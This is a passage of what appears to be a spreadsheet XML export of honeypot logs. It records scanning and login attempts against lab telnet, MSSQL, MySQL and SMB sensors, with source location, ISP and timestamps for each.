    <s v="France"/>
    <s v="IDF"/>
    <s v="Île-de-France"/>
    <s v="Paris"/>
    <s v="Paris"/>
    <s v="2988507"/>
    <s v="75000"/>
    <s v="48.8566"/>
    <s v="2.35222"/>
    <s v="3215"/>
    <s v="Orange S.A."/>
    <s v="Orange"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:56e9:979b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1310"/>
    <x v="1310"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T14:43:39"/>
    <d v="2025-03-21T13:51:19"/>
    <d v="2025-04-17T14:43:39"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H43&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Ranga Reddy"/>
    <s v="Hyderabad (Banjara Hills)"/>
    <s v="1269843"/>
    <s v="500034"/>
    <s v="17.4237"/>
    <s v="78.4277"/>
    <s v="17754"/>
    <s v="Excellmedia"/>
    <s v="ExcellMedia Pvt Ltd"/>
    <s v="business"/>
    <s v="Excell Media Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af65:83a4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1311"/>
    <x v="1311"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T14:38:13"/>
    <d v="2024-09-12T00:35:00"/>
    <d v="2025-04-17T14:38:13"/>
    <n v="67"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H2"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UK"/>
    <s v="Uttarakhand"/>
    <s v="Udam Singh Nagar"/>
    <s v="Rudrapur (Jain Colony)"/>
    <s v="8740322"/>
    <s v="NA"/>
    <s v="28.9807"/>
    <s v="79.389"/>
    <s v="136698"/>
    <s v="Devdarpan Broadband Pvt. Ltd."/>
    <s v="Devdarpan Broadband Pvt. Ltd."/>
    <s v="business"/>
    <s v="Devdarpan Broadband Pvt. Ltd."/>
    <s v="2017-01-09"/>
    <s v="DEVDRPAN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.83.11.130,62356)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6753:b82"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1312"/>
    <x v="1312"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T14:30:02"/>
    <d v="2025-04-14T19:17:11"/>
    <d v="2025-04-17T14:30:02"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="395003"/>
    <s v="21.1702"/>
    <s v="72.8311"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="RJIL North FTTX PUBLIC"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3124:d2f0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1313"/>
    <x v="1313"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T14:27:36"/>
    <d v="2025-04-17T14:18:20"/>
    <d v="2025-04-17T14:27:36"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f4:cd2f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1314"/>
    <x v="1314"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T14:26:41"/>
    <d v="2025-04-17T14:22:52"/>
    <d v="2025-04-17T14:26:41"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Nagpur"/>
    <s v="Nagpur"/>
    <s v="1262180"/>
    <s v="NA"/>
    <s v="21.1463"/>
    <s v="79.0849"/>
    <s v="55341"/>
    <s v="51/A RACHNA MIDAS GOKULPETH"/>
    <s v="Fribzi Multi Technologies Pvt. Ltd"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6738:c50e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1315"/>
    <x v="1315"/>
    <s v="NA&amp;&amp;bband-dyn173.95-103-203.t-com.sk"/>
    <x v="0"/>
    <d v="2025-04-17T14:13:05"/>
    <d v="2025-03-30T15:42:42"/>
    <d v="2025-04-17T14:13:05"/>
    <n v="150"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SK"/>
    <s v="Slovakia"/>
    <s v="TC"/>
    <s v="Trenčín Region"/>
    <s v="Považská Bystrica District"/>
    <s v="Považská Bystrica"/>
    <s v="3058060"/>
    <s v="NA"/>
    <s v="49.1215"/>
    <s v="18.4217"/>
    <s v="6855"/>
    <s v="Slovak Telekom, a.s."/>
    <s v="Slovak Telecom AS6855"/>
    <s v="residential"/>
    <s v="Slovak Telekom, a.s."/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5f67:cbad"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1316"/>
    <x v="1316"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T14:12:10"/>
    <d v="2025-01-13T07:35:24"/>
    <d v="2025-04-17T14:12:10"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Tsing Yi"/>
    <s v="1818483"/>
    <s v="NA"/>
    <s v="22.3484"/>
    <s v="114.112"/>
    <s v="9304"/>
    <s v="HGC Global Communications Limited"/>
    <s v="HGC Global Communications Limited"/>
    <s v="business"/>
    <s v="HGC Global Communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dabd:8962"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1317"/>
    <x v="1317"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T14:10:35"/>
    <d v="2025-03-06T15:27:36"/>
    <d v="2025-04-17T14:10:35"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Cássia"/>
    <s v="Cássia"/>
    <s v="3466752"/>
    <s v="NA"/>
    <s v="-20.5831"/>
    <s v="-46.9219"/>
    <s v="61638"/>
    <s v="Impactnet Telecomunicacoes LTDA"/>
    <s v="Impactnet Telecomunicacoes LTDA"/>
    <s v="business"/>
    <s v="Impactnet Telecomunicacoes LTDA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8364:885d"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1318"/>
    <x v="1318"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T14:10:18"/>
    <d v="2025-04-15T11:52:38"/>
    <d v="2025-04-17T14:10:18"/>
    <n v="54"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="53"/>
    <s v="Poltava"/>
    <s v="Kremenchuk Raion"/>
    <s v="Hradyzk"/>
    <s v="708210"/>
    <s v="NA"/>
    <s v="49.2394"/>
    <s v="33.1394"/>
    <s v="41229"/>
    <s v="Lushchan Evgenij Ivanovich"/>
    <s v="uavisti LikoNet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c340:fcb0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1319"/>
    <x v="1319"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:58:53"/>
    <d v="2025-03-08T23:33:05"/>
    <d v="2025-04-17T13:58:53"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Varanasi"/>
    <s v="Varanasi (Gurūbāgh)"/>
    <s v="1253405"/>
    <s v="221002"/>
    <s v="25.3048"/>
    <s v="82.9938"/>
    <s v="134908"/>
    <s v="IKON BROADBAND PRIVATE LIMITED"/>
    <s v="Ikon Broadband Private Limited"/>
    <s v="residential"/>
    <s v="Ikon Broadband Private Limited"/>
    <s v="2016-04-13"/>
    <s v="IKONBROADBAND"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67d6:be95"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1320"/>
    <x v="1320"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:54:09"/>
    <d v="2025-04-16T23:13:26"/>
    <d v="2025-04-17T13:54:09"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>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None"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:9717"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1321"/>
    <x v="1321"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:50:18"/>
    <d v="2025-04-17T13:48:51"/>
    <d v="2025-04-17T13:50:18"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abe1:8b9a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1322"/>
    <x v="1322"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:49:33"/>
    <d v="2023-11-27T09:52:43"/>
    <d v="2025-04-17T13:49:33"/>
    <n v="231"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;10554&amp;&amp;3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f4:bd32"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1323"/>
    <x v="1323"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:37:25"/>
    <d v="2025-04-17T13:37:25"/>
    <d v="2025-04-17T13:37:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Ratchathewi"/>
    <s v="Ratchathewi"/>
    <s v="7026885"/>
    <s v="NA"/>
    <s v="13.759"/>
    <s v="100.534"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:656d:a71e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1324"/>
    <x v="1324"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:36:42"/>
    <d v="2023-11-24T21:06:00"/>
    <d v="2025-04-17T13:36:42"/>
    <n v="40153"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;52157&amp;&amp;1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Raigad"/>
    <s v="Murud"/>
    <s v="1262403"/>
    <s v="NA"/>
    <s v="18.3282"/>
    <s v="72.9621"/>
    <s v="55352"/>
    <s v="Microscan Internet Limited"/>
    <s v="Microscan ISP"/>
    <s v="residential"/>
    <s v="Skandha Networks LLP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.127.89.151,59504)}&amp;&amp;{Data_SMB:Incoming connection (45.127.89.151,50466)}&amp;&amp;{Data_SMB:Incoming connection (45.127.89.151,50992)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d7f:5997"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1325"/>
    <x v="1325"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:36:30"/>
    <d v="2024-12-02T10:14:25"/>
    <d v="2025-04-17T13:36:30"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
